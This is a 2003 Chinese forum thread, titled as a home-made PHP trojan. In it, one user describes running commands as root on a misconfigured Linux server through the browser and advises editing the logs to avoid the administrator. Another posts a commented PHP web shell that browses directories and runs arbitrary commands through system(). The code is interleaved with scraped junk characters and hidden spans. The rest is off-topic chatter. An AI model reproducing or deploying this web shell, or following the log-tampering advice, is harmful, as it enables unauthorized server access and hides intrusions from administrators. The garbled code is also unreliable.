我写的一个PHP的简单木马

ASEE

重在实用，HoHo,某天发现某个LINUX服务器居然使用root权限执行PHP，真是让我心动不已，浏览器就是我的SHELL，因为有root权限，因此我就%￥##··*，当然不要忘了修改日志文件，HoHo,不然管理员会告你。 ! N& j. _+ E! A- g' J' K1 k/ vxx.php如下（太简陋了，不免高手门笑话，hoho） 3 G( ]0 k0 e4 v; B5 ?7 R //获得指定文件的文本 , `) t; D; U M3 wfunction getfile($filename) ( p6 V* v. l, H# t* R" q4 T0 e, Q/ r{ if (!$filename){ + z( _0 p4 R- B, g return false; } $fp = @fopen($filename,"r"); if (!$fp){ 9 M; I3 h0 N6 n, b; n. V0 A return false; % M% u( \9 Y) E; k } $fdata = @fread($fp,filesize($filename)); 9 D; t; {) v' Y# B4 ]8 T fclose($fp); 1 ^0 s$ n0 g) s$ Y2 I" E/ [, O return $fdata; } $str="

yzhlinux

ACEE 的程序用来得到文件在好不过，工厂虽小，但是还用了摸板替换的思想，可贵！ 但是在得到指定文件之前必须先看看服务器上都有些什么，想在服务器上执行命令，ACEE 的命令执行功能不够，这里我给大家这个专业的 shell。 /* GNU */ 8 e* H. e2 n3 L/ K( X0 o/ S! @/* 您可以任意传播，不过请一定写出作者名字 */ /* 原作者： Martin Geisler 4 r. I" a' e9 v, J- i8 s改写汉化： YZHLINUX */ " Y2 T3 g7 {8 L+ j3 U8 _: }4 G 1 n/ I( Z3 t! G% \. b. p! x& F 5 {0 U* S) V u6 J0 D 6 c& J$ K& N# D: G9 u: b/* 首先检查 $work_dir 是否被设置了值,这是我们的工作目录 */ if (isset($work_dir)) { # U+ O1 I4 g/ F2 d /* 说明已经设置了 工作目录 ,那么我们就吧当前目录改变倒这个地方 */ chdir($work_dir); $work_dir = exec("pwd"); // pwd 是 Unix 中显示当前目录的命令,这里我们执行它.得到当前目录 9 w3 i& l6 \0 r! O. K8 H6 n} else { 1 m( T( i2 k+ t1 f) [( x: @ /* 如果没有设置 工作目录,那么我们就到 apache 的工作目录 0 V7 k" m! @; {4 o5 n5 d, L 注: $DOCUMENT_ROOT 是系统提供的*/ . n8 n( l9 @5 r6 r& G% Q chdir($DOCUMENT_ROOT); ' Z8 w& g" ]1 f8 w! E) {% X $work_dir = $DOCUMENT_ROOT; ( W( Z, N( k- e} ?>

& ~- T& S L0 C( }' b

当前工作目录: . b2 }4 |, W2 Q5 d, v $work_dir_splitted = explode("/", substr($work_dir, 1)); echo "Root/"; if ($work_dir_splitted[0] == "") { 7 E! a5 a, E' W) v n- ]# y $work_dir = "/"; /* 根目录. */ } else { & f) c0 Y. `# S9 D R6 Y for ($i = 0; $i < count($work_dir_splitted); $i++) { ) e1 Z: \$ R2 ?9 Q! S /* echo "i = $i";*/ $url .= "/".$work_dir_splitted[$i]; # Z+ {$ I% O. L8 K4 _% K7 c echo "$work_dir_splitted[$i]/"; } 5 K- k9 T( ^) i* t8 E' b} ' o" }* F7 u1 i+ ?0 W?>

- T1 L% D; h- o" ?7 k E

选择新的工作目录:

# f5 L# h5 j+ Z# n3 h/ c7 ~ 0 s2 f' d" w& H/* 现在我们对这个目录坐一个文件列表 */ * P+ M7 ^% q# P: D7 c7 y$dir_handle = opendir($work_dir); /* 来一个遍历找出所有的文件和目录 */ while ($dir = readdir($dir_handle)) { if (is_dir($dir)) { if ($dir == ".") { ; j% e: ]4 ` j. g7 N! d9 T echo "Current Directory\n"; $ C g* v: \) o: w: y( S } elseif ($dir == "..") { /* 我们找到了父目录,我们要注意里看看父目录是不是根目录 (/) */ if (strlen($work_dir) == 1) { 4 [9 a. X2 h( T/ ^, s$ R0 o* L+ D /* 长度只有 1 ---- 那么只能是 '/' 了 */ } elseif (strrpos($work_dir, "/") == 0) { /* 发现第一个字符是 / 说明我到了顶层的目录了比如: /bin 或者 /home etc... */ echo "Parent Directory\n"; } else { echo "Parent Directory\n"; . p0 \& ^5 H5 m* v } } else { if ($work_dir == "/") { echo "$dir\n"; } else { & w& p2 {2 f/ b* [+ Q echo "$dir\n"; & _+ U" a$ M! _5 ~4 X } b( M2 i b6 r# G5 \ } } : D# l5 J/ K+ i& G3 ]( ^- g} 2 `, B$ Q& V% d) _ closedir($dir_handle);//不要忘记关闭 ' Q: _ x6 ]; m3 P?> ; f8 b& ]# \$ r' w) J G3 ~- p

命令:

>

是否捕获错误信息?

Output:

<span style="display:none"> Y5 L. N, e7 j' K0 m& ~</span><?php <span style="display:none"> e' Q- {7 l8 M) S; o</span>if ($command) {<font class="jammer">5 O, Z5 E/ q: [</font> if ($stderr) { <span style="display:none">( d; W7 {" @0 ]! O+ l% q</span> /* 这个命令组能看懂吗? <font class="jammer">- \ N% M/ G/ O5 Y7 [4 i M</font> 短短的一句语句但是做的事情有: 执行命令,把输出的结果保存到 output.txt ,显示 output.txt ,然后删除它!*/ <span style="display:none">' f& h( z) l: P, G/ B</span> system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/output.txt");<font class="jammer">9 z7 J6 }' r/ Y Z</font> }else {<font class="jammer">" ~- r# e% T- f$ z</font> system($command); <span style="display:none">0 [4 b: b( [' k! _/ u/ d9 X* a</span> }<font class="jammer">% U5 \5 A* ~+ ^+ |8 a</font> } <span style="display:none"> R1 F6 e, {9 D) a O' v* x</span>?> <span style="display:none">: E+ e4 D* n3 v6 y6 _" ]</span>

# e1 L# {+ n/ Y5 n; u

[此贴子已经被作者于2003-8-6 15:48:22编辑过]

ASEE

不错，不错。

猴子很忙

能力有限，看不懂。。

晕晕了，第二篇就不看了，第一篇好像见到过了

ASEE

我写的代码还算简洁，噢，HOHO。。。那里见过也不奇怪，需要的时候就自己写。抄一百行代码还不如自己写一行，PHP只能处理字符，处理网叶，干不成大事，说白了，PHP还不如UNIX的各种SHELL。

yzhlinux

PHP 也是可以做Unix 的一个shell的。
语法就是php的语法，只要把编译好的cgi模式的解析程序执行，就是一个shell外壳了

ASEE

是啊，我都有这个想法啊，php 的 VC 源代码我看了很久了，我觉得可以把它改动成我们所设想的东西，嵌入到我们的其他程序中去做控制脚本。HoHo,功能强大哦！
: j4 w  a! _6 M* g: T8 `不过不知道版权会被我们侵犯到什么地步 ：（

yzhlinux  ASEE，你们都是工程的吗？计算机系吗？程序方面很强哦。
9 X# ~) {+ p2 i: s5 ~/ C我是工程的，但不是计算机系的。

yzhlinux

这你也看的出来？
我们既不是工程的也不是计算机系的

哦，这里的工程比较多啊，所以猜的，那你们什么学校的啊？

yzhlinux

我们都工作了你看不出来吗？

呵呵，没看出来，都是哪儿的，搞程序的？

yzhlinux

提供真人实姓，就不叫BBS了，那我注册了帐号还有什么意思？ ：）

又没让你说姓名，我想了解一下这里的高手有多少是学生啊

ASEE

以下是引用ASEE在2003-8-12 23:12:00的发言：
. u4 F* l# C5 @& C6 C2 d4 G3 E是啊，我都有这个想法啊，php 的 VC 源代码我看了很久了，我觉得可以把它改动成我们所设想的东西，嵌入到我们的其他程序中去做控制脚本。HoHo,功能强大哦！
不过不知道版权会被我们侵犯到什么地步 ：（

* T! k% ?- q1 F& E9 A7 w0 Z我有种发梦的感觉，是不是我眼花了，昨晚太累打字打错了，竟然写出这样的话来，我死也不信，如果有人攻击BBS，那就另当别论，或者帮主看不过去，那有另当别论。

yzhlinux

哪里啊，那是我要回复你的，结果却按错了，点成了编辑 ：（。
9 Z+ M  k' ]* O; H想恢复都不行了！ 你说的是什么我现在都忘记了！郁闷！

ASEE

看来这个BB让人郁闷，不过还算快。要不真象上CSDN一样，半天都进不去，干脆不去了，XML做的看来也不过如此，WEB SERVICE也不过如此，.NET也不过如此。

yzhlinux

这里人不多啊，自然快，CSDN 是快的，主要人太多，同时再线的比这里多500倍以上，半夜2:00以后你试试，那时没人，狂快！

yzhlounx 你是工程的吧  呵呵
- |' l; f* M  x. s  K  J